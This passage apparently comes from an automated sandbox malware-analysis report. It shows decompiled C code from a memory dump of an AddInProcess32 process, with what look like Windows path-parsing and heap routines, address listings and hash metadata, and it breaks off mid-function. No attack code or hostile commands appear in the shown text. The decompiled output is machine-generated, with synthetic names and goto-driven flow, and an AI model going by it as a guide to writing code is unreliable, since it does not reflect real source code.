                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                              														_t455 =  *(_t528 - 0xdc);
                              														 *(_t427 + 0x14) = _t455;
                              														_t480 =  *(_t528 - 0xa0);
                              														_t517 = 3;
                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                              															asm("rdtsc");
                              															 *(_t427 + 0x3c) = _t480;
                              														} else {
                              															 *(_t427 + 0x3c) = _t455;
                              														}
                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                              														_t456 =  *[fs:0x18];
                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                              														_t427 = 0;
                              														__eflags = 0;
                              														_t511 = 0x18;
                              														goto L91;
                              													} else {
                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                              														__eflags = _t519;
                              														 *(_t528 - 0x8c) = _t328;
                              														do {
                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                              																_t334 =  *_t519;
                              															} else {
                              																_t334 = 0;
                              															}
                              															_t336 = _t334 & 0x000000ff;
                              															__eflags = _t336;
                              															_t427 =  *(_t528 - 0x88);
                              															if(_t336 == 0) {
                              																_t481 = _t479 + _t506;
                              																__eflags = _t481;
                              																 *(_t528 - 0x78) = _t481;
                              																E0189F3E0(_t479 + _t427, _t457, _t506);
                              																_t529 = _t529 + 0xc;
                              															} else {
                              																_t340 = _t336 - 1;
                              																__eflags = _t340;
                              																if(_t340 == 0) {
                              																	E0189F3E0( *(_t528 - 0xb8), _t457, _t506);
                              																	_t529 = _t529 + 0xc;
                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                              																} else {
                              																	__eflags = _t340 == 0;
                              																	if(_t340 == 0) {
                              																		__eflags = _t506 - 8;
                              																		if(_t506 == 8) {
                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                              																		}
                              																	}
                              																}
                              															}
                              															_t339 = 0x10;
                              															_t519 = _t519 + _t339;
                              															_t263 = _t528 - 0x8c;
                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                              															__eflags =  *_t263;
                              															_t479 =  *(_t528 - 0x78);
                              														} while ( *_t263 != 0);
                              														goto L87;
                              													}
                              												}
                              											} else {
                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                              												 *(_t528 - 0xa2) = _t392;
                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                              												__eflags = _t469;
                              												while(1) {
                              													 *(_t528 - 0xe4) = _t511;
                              													__eflags = _t392;
                              													_t393 = _t427;
                              													if(_t392 != 0) {
                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                              													}
                              													_t395 = (_t393 & 0x000000ff) - _t427;
                              													__eflags = _t395;
                              													if(_t395 == 0) {
                              														_t511 = _t511 +  *_t469;
                              														__eflags = _t511;
                              													} else {
                              														_t398 = _t395 - 1;
                              														__eflags = _t398;
                              														if(_t398 == 0) {
                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                              														} else {
                              															__eflags = _t398 == 1;
                              															if(_t398 == 1) {
                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                              																_t402 =  *_t469 & 0x0000ffff;
                              																 *(_t528 - 0xac) = _t402;
                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                              															}
                              														}
                              													}
                              													__eflags = _t511 -  *(_t528 - 0xe4);
                              													if(_t511 <  *(_t528 - 0xe4)) {
                              														break;
                              													}
                              													_t397 =  *(_t528 - 0x88) + 1;
                              													 *(_t528 - 0x88) = _t397;
                              													_t469 = _t469 + 0x10;
                              													__eflags = _t397 -  *(_t528 + 0x1c);
                              													_t392 =  *(_t528 - 0xa2);
                              													if(_t397 <  *(_t528 + 0x1c)) {
                              														continue;
                              													}
                              													goto L45;
                              												}
                              												_t475 = 0x216;
                              												 *(_t528 - 0x74) = 0x216;
                              												goto L45;
                              											}
                              										} else {
                              											asm("lock dec dword [eax+ecx*8+0x4]");
                              											goto L16;
                              										}
                              									}
                              									_t491 = E01924CAB(_t306, _t528 - 0xa4);
                              									 *(_t528 - 0x74) = _t491;
                              									__eflags = _t491;
                              									if(_t491 != 0) {
                              										goto L91;
                              									} else {
                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                              										goto L20;
                              									}
                              								}
                              								L16:
                              								 *(_t528 - 0x74) = 0x1069;
                              								L93:
                              								_t298 =  *(_t528 - 0xd0) + 1;
                              								 *(_t528 - 0xd0) = _t298;
                              								_t474 = _t474 + _t511;
                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                              								_t494 = 4;
                              								__eflags = _t298 - _t494;
                              								if(_t298 >= _t494) {
                              									goto L100;
                              								}
                              								_t494 =  *(_t528 - 0xcc);
                              								_t435 = _t298;
                              								continue;
                              							}
                              							__eflags = _t494[2] | _t494[3];
                              							if((_t494[2] | _t494[3]) == 0) {
                              								goto L15;
                              							}
                              							goto L12;
                              						}
                              						__eflags = _t301;
                              						if(_t301 != 0) {
                              							goto L92;
                              						}
                              						goto L10;
                              						L92:
                              						goto L93;
                              					}
                              				} else {
                              					_push(0x57);
                              					L101:
                              					return E018AD130(_t427, _t494, _t511);
                              				}
                              			}
                              0x0192632f
                              0x01926330
                              0x01926333
                              0x0192633a
                              0x0192633c
                              0x01926335
                              0x01926335
                              0x01926335
                              0x0192633f
                              0x01926342
                              0x0192634c
                              0x01926352
                              0x01926355
                              0x01926355
                              0x01926359
                              0x00000000
                              0x0192626f
                              0x01926275
                              0x01926275
                              0x01926278
                              0x0192627e
                              0x0192627e
                              0x01926281
                              0x01926287
                              0x0192628d
                              0x01926298
                              0x0192629c
                              0x019262a2
                              0x0192629e
                              0x0192629e
                              0x0192629e
                              0x019262a7
                              0x019262a7
                              0x019262aa
                              0x019262b0
                              0x019262f0
                              0x019262f0
                              0x019262f2
                              0x019262f8
                              0x019262fd
                              0x019262b2
                              0x019262b2
                              0x019262b2
                              0x019262b5
                              0x019262dd
                              0x019262e2
                              0x019262e5
                              0x019262b7
                              0x019262b8
                              0x019262bb
                              0x019262bd
                              0x019262c0
                              0x019262c4
                              0x019262cd
                              0x019262cd
                              0x019262c0
                              0x019262bb
                              0x019262b5
                              0x01926302
                              0x01926303
                              0x01926305
                              0x01926305
                              0x01926305
                              0x0192630c
                              0x0192630c
                              0x00000000
                              0x0192627e
                              0x01926269
                              0x01925eac
                              0x01925ebb
                              0x01925ebe
                              0x01925ecb
                              0x01925ecb
                              0x01925ece
                              0x01925ece
                              0x01925ed4
                              0x01925ed7
                              0x01925ed9
                              0x01925edb
                              0x01925edb
                              0x01925ee1
                              0x01925ee1
                              0x01925ee3
                              0x01925f20
                              0x01925f20
                              0x01925ee5
                              0x01925ee5
                              0x01925ee5
                              0x01925ee8
                              0x01925f11
                              0x01925f18
                              0x01925eea
                              0x01925eea
                              0x01925eed
                              0x01925ef2
                              0x01925ef8
                              0x01925efb
                              0x01925f0a
                              0x01925f0a
                              0x01925eed
                              0x01925ee8
                              0x01925f22
                              0x01925f28
                              0x00000000
                              0x00000000
                              0x01925f30
                              0x01925f31
                              0x01925f37
                              0x01925f3a
                              0x01925f3d
                              0x01925f44
                              0x00000000
                              0x00000000
                              0x00000000
                              0x01925f46
                              0x01925f48
                              0x01925f4d
                              0x00000000
                              0x01925f4d
                              0x01925dda
                              0x01925ddf
                              0x00000000
                              0x01925ddf
                              0x01925dd8
                              0x01925da7
                              0x01925da9
                              0x01925dac
                              0x01925dae
                              0x00000000
                              0x01925db4
                              0x01925db4
                              0x00000000
                              0x01925db4
                              0x01925dae
                              0x01925d88
                              0x01925d8d
                              0x01926363
                              0x01926369
                              0x0192636a
                              0x01926370
                              0x01926372
                              0x0192637a
                              0x0192637b
                              0x0192637d
                              0x00000000
                              0x00000000
                              0x0192637f
                              0x01926385
                              0x00000000
                              0x01926385
                              0x01925d38
                              0x01925d3b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x01925d3b
                              0x01925d27
                              0x01925d29
                              0x00000000
                              0x00000000
                              0x00000000
                              0x01926360
                              0x00000000
                              0x01926360
                              0x01925c10
                              0x01925c10
                              0x019263da
                              0x019263e5
                              0x019263e5

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c7f6408b046527c8d6105c2507f10a1392301f51e3c5cc1e1e0ae0bbc5e443f
                              • Instruction ID: 3f7e54edf85d4002e315a349be9f3ccf5aa85b876e22a0fda7faf77797d82975
                              • Opcode Fuzzy Hash: 4c7f6408b046527c8d6105c2507f10a1392301f51e3c5cc1e1e0ae0bbc5e443f
                              • Instruction Fuzzy Hash: 83426E75D00229CFEB24CF68C880BA9BBB5FF45305F1581AAD94DEB246D734AA85CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E01874120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                              				signed int _v8;
                              				void* _v20;
                              				signed int _v24;
                              				char _v532;
                              				char _v540;
                              				signed short _v544;
                              				signed int _v548;
                              				signed short* _v552;
                              				signed short _v556;
                              				signed short* _v560;
                              				signed short* _v564;
                              				signed short* _v568;
                              				void* _v570;
                              				signed short* _v572;
                              				signed short _v576;
                              				signed int _v580;
                              				char _v581;
                              				void* _v584;
                              				unsigned int _v588;
                              				signed short* _v592;
                              				void* _v597;
                              				void* _v600;
                              				void* _v604;
                              				void* _v609;
                              				void* _v616;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				unsigned int _t161;
                              				signed int _t162;
                              				unsigned int _t163;
                              				void* _t169;
                              				signed short _t173;
                              				signed short _t177;
                              				signed short _t181;
                              				unsigned int _t182;
                              				signed int _t185;
                              				signed int _t213;
                              				signed int _t225;
                              				short _t233;
                              				signed char _t234;
                              				signed int _t242;
                              				signed int _t243;
                              				signed int _t244;
                              				signed int _t245;
                              				signed int _t250;
                              				void* _t251;
                              				signed short* _t254;
                              				void* _t255;
                              				signed int _t256;
                              				void* _t257;
                              				signed short* _t260;
                              				signed short _t265;
                              				signed short* _t269;
                              				signed short _t271;
                              				signed short** _t272;
                              				signed short* _t275;
                              				signed short _t282;
                              				signed short _t283;
                              				signed short _t290;
                              				signed short _t299;
                              				signed short _t307;
                              				signed int _t308;
                              				signed short _t311;
                              				signed short* _t315;
                              				signed short _t316;
                              				void* _t317;
                              				void* _t319;
                              				signed short* _t321;
                              				void* _t322;
                              				void* _t323;
                              				unsigned int _t324;
                              				signed int _t325;
                              				void* _t326;
                              				signed int _t327;
                              				signed int _t329;
                              
                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                              				_v8 =  *0x194d360 ^ _t329;
                              				_t157 = _a8;
                              				_t321 = _a4;
                              				_t315 = __edx;
                              				_v548 = __ecx;
                              				_t305 = _a20;
                              				_v560 = _a12;
                              				_t260 = _a16;
                              				_v564 = __edx;
                              				_v580 = _a8;
                              				_v572 = _t260;
                              				_v544 = _a20;
                              				if( *__edx <= 8) {
                              					L3:
                              					if(_t260 != 0) {
                              						 *_t260 = 0;
                              					}
                              					_t254 =  &_v532;
                              					_v588 = 0x208;
                              					if((_v548 & 0x00000001) != 0) {
                              						_v556 =  *_t315;
                              						_v552 = _t315[2];
                              						_t161 = E0188F232( &_v556);
                              						_t316 = _v556;
                              						_v540 = _t161;
                              						goto L17;
                              					} else {
                              						_t306 = 0x208;
                              						_t298 = _t315;
                              						_t316 = E01876E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                              						if(_t316 == 0) {
                              							L68:
                              							_t322 = 0xc0000033;
                              							goto L39;
                              						} else {
                              							while(_v581 == 0) {
                              								_t233 = _v588;
                              								if(_t316 > _t233) {
                              									_t234 = _v548;
                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                              										_t254 = L01874620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                              										if(_t254 == 0) {
                              											_t169 = 0xc0000017;
                              										} else {
                              											_t298 = _v564;
                              											_v588 = _t316;
                              											_t306 = _t316;
                              											_t316 = E01876E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                              											if(_t316 != 0) {
                              												continue;
                              											} else {
                              												goto L68;
                              											}
                              										}
                              									} else {
                              										goto L90;
                              									}
                              								} else {
                              									_v556 = _t316;
                              									 *((short*)(_t329 + 0x32)) = _t233;
                              									_v552 = _t254;
                              									if(_t316 < 2) {
                              										L11:
                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                              											_t161 = 5;
                              										} else {
                              											if(_t316 < 6) {
                              												L87:
                              												_t161 = 3;
                              											} else {
                              												_t242 = _t254[2] & 0x0000ffff;
                              												if(_t242 != 0x5c) {
                              													if(_t242 == 0x2f) {
                              														goto L16;
                              													} else {
                              														goto L87;
                              													}
                              													goto L101;
                              												} else {
                              													L16:
                              													_t161 = 2;
                              												}
                              											}
                              										}
                              									} else {
                              										_t243 =  *_t254 & 0x0000ffff;
                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                              											if(_t316 < 4) {
                              												L81:
                              												_t161 = 4;
                              												goto L17;
                              											} else {
                              												_t244 = _t254[1] & 0x0000ffff;
                              												if(_t244 != 0x5c) {
                              													if(_t244 == 0x2f) {
                              														goto L60;
                              													} else {
                              														goto L81;
                              													}
                              												} else {
                              													L60:
                              													if(_t316 < 6) {
                              														L83:
                              														_t161 = 1;
                              														goto L17;
                              													} else {
                              														_t245 = _t254[2] & 0x0000ffff;
                              														if(_t245 != 0x2e) {
                              															if(_t245 == 0x3f) {
                              																goto L62;
                              															} else {
                              																goto L83;
                              															}
                              														} else {
                              															L62:
                              															if(_t316 < 8) {
                              																L85:
                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                              																goto L17;
                              															} else {
                              																_t250 = _t254[3] & 0x0000ffff;
                              																if(_t250 != 0x5c) {
                              																	if(_t250 == 0x2f) {
                              																		goto L64;
                              																	} else {
                              																		goto L85;
                              																	}
                              																} else {
                              																	L64:
                              																	_t161 = 6;
                              																	goto L17;
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              											goto L101;
                              										} else {
                              											goto L11;
                              										}
                              									}
                              									L17:
                              									if(_t161 != 2) {
                              										_t162 = _t161 - 1;
                              										if(_t162 > 5) {
                              											goto L18;
                              										} else {
                              											switch( *((intOrPtr*)(_t162 * 4 +  &M018745F8))) {
                              												case 0:
                              													_v568 = 0x1831078;
                              													__eax = 2;
                              													goto L20;
                              												case 1:
                              													goto L18;
                              												case 2:
                              													_t163 = 4;
                              													goto L19;
                              											}
                              										}
                              										goto L41;
                              									} else {
                              										L18:
                              										_t163 = 0;
                              										L19:
                              										_v568 = 0x18311c4;
                              									}
                              									L20:
                              									_v588 = _t163;
                              									_v564 = _t163 + _t163;
                              									_t306 =  *_v568 & 0x0000ffff;
                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                              									_v576 = _t265;
                              									if(_t265 > 0xfffe) {
                              										L90:
                              										_t322 = 0xc0000106;
                              									} else {
                              										if(_t321 != 0) {
                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                              												if(_v580 != 0) {
                              													goto L23;
                              												} else {
                              													_t322 = 0xc0000106;
                              													goto L39;
                              												}
                              											} else {
                              												_t177 = _t306;
                              												goto L25;
                              											}
                              											goto L101;
                              										} else {
                              											if(_v580 == _t321) {
                              												_t322 = 0xc000000d;
                              											} else {
                              												L23:
                              												_t173 = L01874620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                              												_t269 = _v592;
                              												_t269[2] = _t173;
                              												if(_t173 == 0) {
                              													_t322 = 0xc0000017;
                              												} else {
                              													_t316 = _v556;
                              													 *_t269 = 0;
                              													_t321 = _t269;
                              													_t269[1] = _v576;
                              													_t177 =  *_v568 & 0x0000ffff;
                              													L25:
                              													_v580 = _t177;
                              													if(_t177 == 0) {
                              														L29:
                              														_t307 =  *_t321 & 0x0000ffff;
                              													} else {
                              														_t290 =  *_t321 & 0x0000ffff;
                              														_v576 = _t290;
                              														_t310 = _t177 & 0x0000ffff;
                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                              															_t307 =  *_t321 & 0xffff;
                              														} else {
                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                              															E0189F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                              															_t329 = _t329 + 0xc;
                              															_t311 = _v580;
                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                              															 *_t321 = _t225;
                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                              															}
                              															goto L29;
                              														}
                              													}
                              													_t271 = _v556 - _v588 + _v588;
                              													_v580 = _t307;
                              													_v576 = _t271;
                              													if(_t271 != 0) {
                              														_t308 = _t271 & 0x0000ffff;
                              														_v588 = _t308;
                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                              															E0189F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                              															_t329 = _t329 + 0xc;
                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                              															 *_t321 = _t213;
                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                              															}
                              														}
                              													}
                              													_t272 = _v560;
                              													if(_t272 != 0) {
                              														 *_t272 = _t321;
                              													}
                              													_t306 = 0;
                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                              													_t275 = _v572;
                              													if(_t275 != 0) {
                              														_t306 =  *_t275;
                              														if(_t306 != 0) {
                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                              														}
                              													}
                              													_t181 = _v544;
                              													if(_t181 != 0) {
                              														 *_t181 = 0;
                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                              														if(_v540 == 5) {
                              															_t182 = E018552A5(1);
                              															_v588 = _t182;
                              															if(_t182 == 0) {
                              																E0186EB70(1, 0x19479a0);
                              																goto L38;
                              															} else {
                              																_v560 = _t182 + 0xc;
                              																_t185 = E0186AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                              																if(_t185 == 0) {
                              																	_t324 = _v588;
                              																	goto L97;
                              																} else {
                              																	_t306 = _v544;
                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                              																	 *(_t306 + 4) = _t282;
                              																	_v576 = _t282;
                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                              																	 *_t306 = _t325;
                              																	if( *_t282 == 0x5c) {
                              																		_t149 = _t325 - 2; // -2
                              																		_t283 = _t149;
                              																		 *_t306 = _t283;
                              																		 *(_t306 + 4) = _v576 + 2;
                              																		_t185 = _t283 & 0x0000ffff;
                              																	}
                              																	_t324 = _v588;
                              																	 *(_t306 + 2) = _t185;
                              																	if((_v548 & 0x00000002) == 0) {
                              																		L97:
                              																		asm("lock xadd [esi], eax");
                              																		if((_t185 | 0xffffffff) == 0) {
                              																			_push( *((intOrPtr*)(_t324 + 4)));
                              																			E018995D0();
                              																			L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                              																		}
                              																	} else {
                              																		 *(_t306 + 0xc) = _t324;
                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                              																	}
                              																	goto L38;
                              																}
                              															}
                              															goto L41;
                              														}
                              													}
                              													L38:
                              													_t322 = 0;
                              												}
                              											}
                              										}
                              									}
                              									L39:
                              									if(_t254 !=  &_v532) {
                              										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                              									}
                              									_t169 = _t322;
                              								}
                              								goto L41;
                              							}
                              							goto L68;
                              						}
                              					}
                              					L41:
                              					_pop(_t317);
                              					_pop(_t323);
                              					_pop(_t255);
                              					return E0189B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                              				} else {
                              					_t299 = __edx[2];
                              					if( *_t299 == 0x5c) {
                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                              						if(_t256 != 0x5c) {
                              							if(_t256 != 0x3f) {
                              								goto L2;
                              							} else {
                              								goto L50;
                              							}
                              						} else {
                              							L50:
                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                              								goto L2;
                              							} else {
                              								_t251 = E01893D43(_t315, _t321, _t157, _v560, _v572, _t305);
                              								_pop(_t319);
                              								_pop(_t326);
                              								_pop(_t257);
                              								return E0189B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                              							}
                              						}
                              					} else {
                              						L2:
                              						_t260 = _v572;
                              						goto L3;
                              					}
                              				}
                              				L101:
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96a5334d6c4b460b25b749c80bb847b5206ca452b5588ccf7b01eb3fdfe6cf2c
                              • Instruction ID: f99e28dbe4c7cc914aca6cb3637a260cbcdacd804de02703c7f362cca4826230
                              • Opcode Fuzzy Hash: 96a5334d6c4b460b25b749c80bb847b5206ca452b5588ccf7b01eb3fdfe6cf2c
                              • Instruction Fuzzy Hash: 29F1AE706086118FC724CF18C480ABABBE1FF88718F15492EF99ACB351E734DA95DB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E018820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                              				signed int _v16;
                              				signed int _v20;
                              				signed char _v24;
                              				intOrPtr _v28;
                              				signed int _v32;
                              				void* _v36;
                              				char _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				unsigned int _v60;
                              				char _v64;
                              				unsigned int _v68;
                              				signed int _v72;
                              				char _v73;
                              				signed int _v74;
                              				char _v75;
                              				signed int _v76;
                              				void* _v81;
                              				void* _v82;
                              				void* _v89;
                              				void* _v92;
                              				void* _v97;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed char _t128;
                              				void* _t129;
                              				signed int _t130;
                              				void* _t132;
                              				signed char _t133;
                              				intOrPtr _t135;
                              				signed int _t137;
                              				signed int _t140;
                              				signed int* _t144;
                              				signed int* _t145;
                              				intOrPtr _t146;
                              				signed int _t147;
                              				signed char* _t148;
                              				signed int _t149;
                              				signed int _t153;
                              				signed int _t169;
                              				signed int _t174;
                              				signed int _t180;
                              				void* _t197;
                              				void* _t198;
                              				signed int _t201;
                              				intOrPtr* _t202;
                              				intOrPtr* _t205;
                              				signed int _t210;
                              				signed int _t215;
                              				signed int _t218;
                              				signed char _t221;
                              				signed int _t226;
                              				char _t227;
                              				signed int _t228;
                              				void* _t229;
                              				unsigned int _t231;
                              				void* _t235;
                              				signed int _t240;
                              				signed int _t241;
                              				void* _t242;
                              				signed int _t246;
                              				signed int _t248;
                              				signed int _t252;
                              				signed int _t253;
                              				void* _t254;
                              				intOrPtr* _t256;
                              				intOrPtr _t257;
                              				unsigned int _t262;
                              				signed int _t265;
                              				void* _t267;
                              				signed int _t275;
                              
                              				_t198 = __ebx;
                              				_t267 = (_t265 & 0xfffffff0) - 0x48;
                              				_v68 = __ecx;
                              				_v73 = 0;
                              				_t201 = __edx & 0x00002000;
                              				_t128 = __edx & 0xffffdfff;
                              				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                              				_v72 = _t128;
                              				if((_t128 & 0x00000008) != 0) {
                              					__eflags = _t128 - 8;
                              					if(_t128 != 8) {
                              						L69:
                              						_t129 = 0xc000000d;
                              						goto L23;
                              					} else {
                              						_t130 = 0;
                              						_v72 = 0;
                              						_v75 = 1;
                              						L2:
                              						_v74 = 1;
                              						_t226 =  *0x1948714; // 0x0
                              						if(_t226 != 0) {
                              							__eflags = _t201;
                              							if(_t201 != 0) {
                              								L62:
                              								_v74 = 1;
                              								L63:
                              								_t130 = _t226 & 0xffffdfff;
                              								_v72 = _t130;
                              								goto L3;
                              							}
                              							_v74 = _t201;
                              							__eflags = _t226 & 0x00002000;
                              							if((_t226 & 0x00002000) == 0) {
                              								goto L63;
                              							}
                              							goto L62;
                              						}
                              						L3:
                              						_t227 = _v75;
                              						L4:
                              						_t240 = 0;
                              						_v56 = 0;
                              						_t252 = _t130 & 0x00000100;
                              						if(_t252 != 0 || _t227 != 0) {
                              							_t240 = _v68;
                              							_t132 = E01882EB0(_t240);
                              							__eflags = _t132 - 2;
                              							if(_t132 != 2) {
                              								__eflags = _t132 - 1;
                              								if(_t132 == 1) {
                              									goto L25;
                              								}
                              								__eflags = _t132 - 6;
                              								if(_t132 == 6) {
                              									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                              									if( *((short*)(_t240 + 4)) != 0x3f) {
                              										goto L40;
                              									}
                              									_t197 = E01882EB0(_t240 + 8);
                              									__eflags = _t197 - 2;
                              									if(_t197 == 2) {
                              										goto L25;
                              									}
                              								}
                              								L40:
                              								_t133 = 1;
                              								L26:
                              								_t228 = _v75;
                              								_v56 = _t240;
                              								__eflags = _t133;
                              								if(_t133 != 0) {
                              									__eflags = _t228;
                              									if(_t228 == 0) {
                              										L43:
                              										__eflags = _v72;
                              										if(_v72 == 0) {
                              											goto L8;
                              										}
                              										goto L69;
                              									}
                              									_t133 = E018558EC(_t240);
                              									_t221 =  *0x1945cac; // 0x16
                              									__eflags = _t221 & 0x00000040;
                              									if((_t221 & 0x00000040) != 0) {
                              										_t228 = 0;
                              										__eflags = _t252;
                              										if(_t252 != 0) {
                              											goto L43;
                              										}
                              										_t133 = _v72;
                              										goto L7;
                              									}
                              									goto L43;
                              								} else {
                              									_t133 = _v72;
                              									goto L6;
                              								}
                              							}
                              							L25:
                              							_t133 = _v73;
                              							goto L26;
                              						} else {
                              							L6:
                              							_t221 =  *0x1945cac; // 0x16
                              							L7:
                              							if(_t133 != 0) {
                              								__eflags = _t133 & 0x00001000;
                              								if((_t133 & 0x00001000) != 0) {
                              									_t133 = _t133 | 0x00000a00;
                              									__eflags = _t221 & 0x00000004;
                              									if((_t221 & 0x00000004) != 0) {
                              										_t133 = _t133 | 0x00000400;
                              									}
                              								}
                              								__eflags = _t228;
                              								if(_t228 != 0) {
                              									_t133 = _t133 | 0x00000100;
                              								}
                              								_t229 = E01894A2C(0x1946e40, 0x1894b30, _t133, _t240);
                              								__eflags = _t229;
                              								if(_t229 == 0) {
                              									_t202 = _a20;
                              									goto L100;
                              								} else {
                              									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                              									L15:
                              									_t202 = _a20;
                              									 *_t202 = _t135;
                              									if(_t229 == 0) {
                              										L100:
                              										 *_a4 = 0;
                              										_t137 = _a8;
                              										__eflags = _t137;
                              										if(_t137 != 0) {
                              											 *_t137 = 0;
                              										}
                              										 *_t202 = 0;
                              										_t129 = 0xc0000017;
                              										goto L23;
                              									} else {
                              										_t242 = _a16;
                              										if(_t242 != 0) {
                              											_t254 = _t229;
                              											memcpy(_t242, _t254, 0xd << 2);
                              											_t267 = _t267 + 0xc;
                              											_t242 = _t254 + 0x1a;
                              										}
                              										_t205 = _a4;
                              										_t25 = _t229 + 0x48; // 0x48
                              										 *_t205 = _t25;
                              										_t140 = _a8;
                              										if(_t140 != 0) {
                              											__eflags =  *((char*)(_t267 + 0xa));
                              											if( *((char*)(_t267 + 0xa)) != 0) {
                              												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                              											} else {
                              												 *_t140 = 0;
                              											}
                              										}
                              										_t256 = _a12;
                              										if(_t256 != 0) {
